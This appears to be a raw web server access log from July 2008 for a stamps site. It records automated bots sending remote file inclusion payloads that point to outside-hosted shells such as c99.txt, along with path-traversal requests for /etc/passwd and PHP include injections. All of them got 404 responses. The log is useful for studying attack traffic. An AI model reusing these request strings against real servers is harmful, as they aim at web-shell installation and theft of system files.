72.29.68.220 - - [20/Jul/2008:18:44:46 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:44:46 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:44:46 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:44:56 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:44:57 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:44:57 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:45:25 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:45:58 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:45:58 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:46:08 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.52.194 - - [20/Jul/2008:18:46:19 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:46:30 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:46:31 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:46:31 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:47:36 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:47:36 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:18:47:56 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.55.52.194 - - [20/Jul/2008:18:47:59 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.246.78.141 - - [20/Jul/2008:18:48:02 -0700] "GET /logs/access.log//index.php?stranica=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.78.141 - - [20/Jul/2008:18:48:03 -0700] "GET //index.php?stranica=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.78.141 - - [20/Jul/2008:18:48:04 -0700] "GET /logs//index.php?stranica=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.78.141 - - [20/Jul/2008:18:48:23 -0700] "GET /logs/access_080526.log//index.php?stranica=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:48:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:48:42 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
193.136.196.146 - - [20/Jul/2008:18:48:55 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:49:40 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:18:51:36 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:53:15 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:53:15 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:53:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:53:48 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:53:48 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:53:52 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:54:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:54:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:54:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:18:54:26 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:18:54:54 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:18:54:54 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:18:54:54 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:58:33 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:18:59:27 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
210.143.111.146 - - [20/Jul/2008:19:00:35 -0700] "GET /logs/access_080526.log//?mosConfig_absolute_pathhttp://buqtery.cc/c99.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:19:00:36 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:00:51 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:00:52 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:00:55 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:19:01:03 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:19:01:04 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:19:01:04 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:19:01:10 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:03:18 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:03:18 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:03:19 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:03:35 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:05:12 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:05:12 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
72.29.68.220 - - [20/Jul/2008:19:05:14 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:10 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:10 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:14 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:14 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:33 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:06:34 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:07:04 -0700] "GET //index.php?pagina=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:19:07:04 -0700] "GET /logs//index.php?pagina=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:07:17 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.102.16.28 - - [20/Jul/2008:19:07:40 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.gqmed.de/contenido/contenido/includes/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:19:07:48 -0700] "GET //include/admin.lib.inc.php?site_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:19:07:49 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:08:53 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:08:54 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
209.126.254.80 - - [20/Jul/2008:19:09:09 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:19:10:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:11:48 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:11:48 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:11:49 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:17:31 -0700] "GET /logs/access_080421.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:17:31 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:18:36 -0700] "GET /logs/access_080630.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:18:36 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:18:37 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.206.113.104 - - [20/Jul/2008:19:18:40 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:18:55 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:18:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:18:55 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
81.2.200.22 - - [20/Jul/2008:19:18:57 -0700] "GET /logs/access_080428.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:21:19 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:21:19 -0700] "GET //ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:21:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:21:24 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:22:17 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:22:17 -0700] "GET //ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:22:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.118.98.3 - - [20/Jul/2008:19:22:22 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://utenti.lycos.it/kaizoku384/nix/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:24:07 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:24:07 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:24:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:24:40 -0700] "GET /logs/access_080609.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:25:45 -0700] "GET /logs/access_080623.log/components/com_performs/performs.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.135.126 - - [20/Jul/2008:19:25:45 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_pathftp://212.11.127.86/tmp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
